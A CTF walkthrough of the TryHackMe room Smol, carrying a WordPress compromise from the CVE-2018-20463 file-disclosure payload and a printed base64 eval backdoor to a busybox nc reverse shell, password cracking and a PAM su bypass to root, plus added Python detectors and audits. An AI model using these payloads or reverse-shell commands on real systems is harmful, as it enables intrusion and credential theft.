Smol: TryHackMe Writeup

Ansul Kotadia
8 min read · Jan 27, 2025


Smol THM

Smol, but Mighty: 🔍 A WordPress Hacking Adventure

Imagine you’re on a treasure hunt 🏴‍☠️, but instead of a map, you have an Nmap scan, and instead of gold, you’re after root access. Welcome to Smol, a TryHackMe room that packs a punch despite its name. Let’s dive in! 🚀

At the heart of Smol is a WordPress website, a common target due to its extensive plugin ecosystem. The machine showcases a publicly known vulnerable plugin, highlighting the risks of neglecting software updates and security patches. Enhancing the learning experience, Smol introduces a backdoored plugin, emphasizing the significance of meticulous code inspection before integrating third-party components.

For a full detailed walkthrough of the TryHackMe Smol room, including flag answers and passwords, read the complete article at: Smol TryHackMe Writeup with answers.

🕵️‍♂️ Step 1: Scanning for Clues

First things first, we need to check what’s out there. Visiting the site reveals the webpage shown below:

Furthermore, a good old-fashioned Nmap scan reveals two interesting ports:

  • 22 (SSH) 🔑 — Always a solid find but not our first target.
  • 80 (HTTP) 🌐 — Hosting a WordPress site? Now, that’s promising.

Adding smol.thm to our hosts file (/etc/hosts) allows us to browse the site smoothly. 🖥️

🛠️ Step 2: WordPress — The Gift That Keeps on Giving

A quick visit to the site confirms it’s running WordPress, which means wpscan is our best friend. 🤝

wpscan --url http://www.smol.thm/

Boom! 💥 We spot the jsmol2wp v1.07 plugin, which has a delightful little vulnerability (CVE-2018-20463). This flaw allows us to disclose files on the server, and our first target is the wp-config.php file. Navigate to https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt, where you can find the code shown below for exploiting this vulnerability in the plugin:

Modifying this URL to our needs and visiting it gives us further information. CVE-2018-20463 is both an SSRF and a file disclosure vulnerability:

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

As shown in the image below, the file gives us database credentials 🎯 for the user wpuser with the password kbLSF2Vop#lw3rjDZ629*Z%G, and we can log in to WordPress using these credentials:

You can test these credentials at http://www.smol.thm/wp-login.php.

We get a dashboard for us to further investigate:

Wrapping up this step: we extracted database credentials, logged into WordPress, and stumbled upon a to-do list. It casually mentions a potential backdoor in the Hello Dolly plugin. That’s our golden ticket. 🎟️

🎭 Step 3: Exploiting the Backdoor

Next, going to Pages in the left panel of the WordPress dashboard and checking the Webmaster Tasks page reveals a potential backdoor in the Hello Dolly plugin:

Leveraging the file disclosure vulnerability, we can examine the source code of the Hello Dolly plugin by sending a request to:

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-content/plugins/hello.php
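From the defender’s side, both disclosure requests (the wp-config.php one in Step 2 and the hello.php one above) leave a distinctive trace in the web server access log. The following Python detector is an added example, not part of this writeup, that flags jsmol.php requests whose query parameter carries a php:// wrapper, a path traversal or a remote URL; the log lines it reads are constructed samples, not the room’s real logs.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format lines (not from the room): one legitimate
# JSmol data request and two CVE-2018-20463 file-disclosure attempts.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [27/Jan/2025:10:01:02 +0000] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=caffeine.mol HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Jan/2025:10:02:17 +0000] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php HTTP/1.1" 200 3120 "-" "curl/8.0"
10.0.0.9 - - [27/Jan/2025:10:02:40 +0000] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php%3A%2F%2Ffilter%2Fresource%3D..%2F..%2F..%2F..%2Fwp-content%2Fplugins%2Fhello.php HTTP/1.1" 200 4096 "-" "curl/8.0"
10.0.0.7 - - [27/Jan/2025:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

# client ip, timestamp, request target and status code of a combined-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Markers that never belong in a molecule-data file name: stream wrappers,
# directory traversal, or a remote URL (the SSRF side of the same bug).
SUSPICIOUS_MARKERS = ("php://", "../", "file://", "http://", "https://")

def detect_jsmol_disclosure(log_text):
    """Return one alert per jsmol.php request whose query parameter looks like
    a file-disclosure or SSRF payload rather than a plain data file name."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, timestamp, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/jsmol2wp/php/jsmol.php"):
            continue
        # parse_qs decodes one layer of percent-encoding; unquote once more so
        # double-encoded payloads are normalised before matching.
        query = unquote(parse_qs(parts.query).get("query", [""])[0])
        if any(marker in query for marker in SUSPICIOUS_MARKERS):
            alerts.append({"ip": ip, "time": timestamp, "status": status, "query": query})
    return alerts

if __name__ == "__main__":
    for alert in detect_jsmol_disclosure(SAMPLE_ACCESS_LOG):
        print(f"{alert['time']} {alert['ip']} HTTP {alert['status']} -> {alert['query']}")
```

A 200 status on such a request means the server actually returned the file, so those hits deserve a credential rotation, not just a ticket.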

We pull up the Hello Dolly plugin’s code and find something suspicious: 👀

eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));

As this is base64, we can decode it in CyberChef:

Next, I asked ChatGPT what the decoded value meant:

if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); }

How It Works in Practice:

1. If an attacker visits: http://target.com/vulnerable.php?cmd=whoami
2. The script will execute: system("whoami");
3. Returning the current user.

Why Is This Dangerous?

1. This creates a remote command execution (RCE) vulnerability.
2. An attacker can run any system command, potentially gaining full control of the server.
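Rather than pasting the blob into CyberChef and asking ChatGPT, a small scanner can do this triage across a whole plugins directory. The following Python is an added example (not from the writeup or the plugin) that finds eval(base64_decode(...)) calls, decodes the payload and resolves PHP’s octal and hex string escapes, showing that both "\143\155\x64" and "\143\x6d\144" spell cmd; the plugin stub it scans is constructed around the one obfuscated line found above.

```python
import base64
import re

# Constructed plugin stub (not the real hello.php): the obfuscated eval line
# found in the backdoored Hello Dolly plugin, wrapped in minimal plugin code.
SAMPLE_PLUGIN_SOURCE = r"""<?php
/* Plugin Name: Hello Dolly */
function hello_dolly() { echo 'Hello, Dolly'; }
eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));
"""

EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)")
# Double-quoted string keys used to index $_GET / $_POST / $_REQUEST.
SUPERGLOBAL_KEY_RE = re.compile(r'\$_(GET|POST|REQUEST)\["((?:\\.|[^"\\])*)"\]')
# PHP double-quoted escapes: \xHH hex, \NNN octal, and single-character escapes.
PHP_ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\(.)")
EXEC_RE = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(")

def php_unescape(literal):
    """Resolve PHP double-quoted escape sequences to the plain characters."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 8))
        return {"n": "\n", "t": "\t"}.get(m.group(3), m.group(3))
    return PHP_ESCAPE_RE.sub(repl, literal)

def scan_php_source(source):
    """Return one finding per eval(base64_decode(...)): the decoded body, the
    request parameters it reads, and whether it calls a command executor."""
    findings = []
    for m in EVAL_B64_RE.finditer(source):
        decoded = base64.b64decode(m.group(1)).decode("utf-8", "replace").strip()
        params = sorted({php_unescape(key) for _, key in SUPERGLOBAL_KEY_RE.findall(decoded)})
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "decoded": decoded,
            "params": params,  # ["cmd"] once the octal/hex escapes are resolved
            "exec": bool(EXEC_RE.search(decoded)),
        })
    return findings

if __name__ == "__main__":
    for f in scan_php_source(SAMPLE_PLUGIN_SOURCE):
        print(f"line {f['line']}: params={f['params']} exec={f['exec']}\n  {f['decoded']}")
```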

Decoding this reveals a command execution backdoor, triggered via the cmd GET parameter. That’s our in! 🛠️ To obtain a shell, we start a netcat listener on port 4444. Then, using busybox and the vulnerable cmd parameter we discovered earlier, we visit the following link:

http://www.smol.thm/wp-admin/index.php/?cmd=busybox nc YOUR_MACHINE_IP 4444 -e bash

Start the nc listener as:

And visit the site:

We successfully launched a reverse shell: 🐚

And just like that, we’re in as www-data. Time to climb the privilege ladder! 🧗‍♂️ Now just stabilize the shell; to do so, you can read my blog post: How to stabilize a shell like a Pro!

🔝 Step 4: Privilege Escalation — Because We Want It All

Once we have a stabilized shell, we can use the database credentials to retrieve the other users’ password hashes. Simply type:

mysql -u wpuser -p'kbLSF2Vop#lw3rjDZ629*Z%G' -D wordpress

Checking the WordPress database, we see a table containing user password hashes:

🔐 Phase 1: Cracking Passwords

Inside the WordPress database, we extract user hashes. Feeding them to John the Ripper cracks the password for user diego. 🏆

$ john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

So next we switch to the user diego, where we find user.txt, our first flag!!!! YAYYY!!!!!!

🔑 Phase 2: SSH Key Jackpot

Switching to diego, we poke around and find an SSH private key for another user, think. Using it, we log in as think. 🏗️

We can simply use this private key with SSH to gain a shell as the think user. Type the following command after navigating to the /home/think/.ssh directory:

$ ssh -i id_rsa think@smol.thm

🛑 Phase 3: Bypassing PAM Rules

Reading the PAM configuration for su, we notice that think can escalate to gege without a password. Easy win. 🎰

think@smol:~$ cat /etc/pam.d/su
...
auth [success=ignore default=1] pam_succeed_if.so user = gege
auth sufficient pam_succeed_if.so use_uid user = think
...
$ su - gege
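The two pam_succeed_if lines work as a pair: [success=ignore default=1] falls through to the next line only when the target user is gege and skips it for anyone else, and the sufficient line then ends the auth stack with success when the calling uid belongs to think, so no password module ever runs. The following Python audit is an added example (not from the writeup) that parses an su PAM stack and reports such passwordless pairs, plus the stock pam_rootok.so rule; the config it reads is a constructed sample based on the excerpt above.

```python
import re

# Constructed /etc/pam.d/su excerpt (not the room's real file) built around the
# two pam_succeed_if lines that let "think" become "gege" with no password.
SAMPLE_PAM_SU = """\
#%PAM-1.0
auth       sufficient pam_rootok.so
auth       [success=ignore default=1] pam_succeed_if.so user = gege
auth       sufficient pam_succeed_if.so use_uid user = think
session    required pam_env.so readenv=1
@include common-auth
@include common-session
"""

# auth lines: control (plain word or [bracketed]), module, remaining arguments
RULE_RE = re.compile(r"^auth\s+(\[[^\]]+\]|\S+)\s+(\S+)\s*(.*)$")

def parse_auth_rules(text):
    """Return the auth stack as (control, module, args) tuples in file order."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = RULE_RE.match(line)
        if m:
            rules.append(m.groups())
    return rules

def _condition_value(args, field):
    """Extract the value of a pam_succeed_if '<field> = <value>' condition."""
    m = re.search(rf"\b{field}\s*=\s*(\S+)", args)
    return m.group(1) if m else None

def find_passwordless_su(text):
    """Report (caller, target) pairs that this su stack accepts without a password."""
    rules = parse_auth_rules(text)
    grants = []
    for i, (ctrl, mod, args) in enumerate(rules):
        if mod == "pam_rootok.so" and ctrl == "sufficient":
            grants.append(("root", "*"))  # root may su to anyone; expected, but list it
        # Gate on the target user: success=ignore continues to the next rule only
        # for that user, default=1 skips the next rule for everyone else.
        if mod == "pam_succeed_if.so" and ctrl.replace(" ", "") == "[success=ignoredefault=1]":
            target = _condition_value(args, "user")
            if i + 1 < len(rules):
                n_ctrl, n_mod, n_args = rules[i + 1]
                # 'sufficient' on the caller's real uid ends the stack with success.
                if n_mod == "pam_succeed_if.so" and n_ctrl == "sufficient" and "use_uid" in n_args:
                    caller = _condition_value(n_args, "user")
                    if caller and target:
                        grants.append((caller, target))
    return grants
```

Running this over every host’s /etc/pam.d/su is a cheap way to catch this class of "misconfiguration, not exploit" privilege path before an attacker does.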

📂 Phase 4: Cracking an Encrypted ZIP

Discovering an Interesting File: After checking the home directory of the gege user, we stumble upon a ZIP archive named wordpress.old.zip.

gege@smol:~$ ls -la /home/gege
total 31532
drwxr-x--- 2 gege internal 4096 Aug 18 2023 .
drwxr-xr-x 6 root root 4096 Aug 16 2023 ..
lrwxrwxrwx 1 root root 9 Aug 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 gege gege 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 gege gege 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 gege gege 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 Aug 18 2023 .viminfo -> /dev/null
-rwxr-x--- 1 root gege 32266546 Aug 16 2023 wordpress.old.zip

Since we don’t have direct access to this file from our machine, we can transfer it using a simple Python HTTP server.

Transferring the ZIP Archive

We start an HTTP server on the target system:

gege@smol:~$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

Then, on our local machine, we download the file:

$ wget http://smol.thm:8080/wordpress.old.zip

As gege, we have found an encrypted ZIP file containing important WordPress files, and we use zip2john and John the Ripper again to crack the password. 🔓 The archive is password-protected, preventing extraction, so we first generate a hash with zip2john and then run john with the rockyou.txt wordlist, which successfully retrieves the password. This is shown below:

zip2john wordpress.old.zip > wordpress_hash

Using this password, we can unzip the WordPress archive:

Exploring the extracted wp-config.php, we get the credentials for xavi:

👑 Phase 5: Final Sudo Privileges

Using the password obtained, we log in as the xavi user, and upon checking the sudo privileges for xavi we see that the user has full privileges:

With the credentials retrieved from the extracted files, we can run a sudo command to become root. 🏅

$ sudo -l
$ sudo /bin/bash

Boom. 💣 We’re root. Game over. 🎉

📚 Lessons Learned

  1. 🔍 Always scan thoroughly — Enumerating everything is key.
  2. 🔌 Plugins can be your best friend (or worst enemy) — Keep them updated!
  3. 🛡️ Privilege escalation isn’t always about exploits — Sometimes, simple misconfigurations are all you need.
  4. 📜 Never underestimate a to-do list — If an admin is worried about a backdoor, it’s probably worth checking out.

TryHackMe’s Smol room proves that even small vulnerabilities can lead to big wins. 🏆 Happy hacking! 🕶️

Thank you!
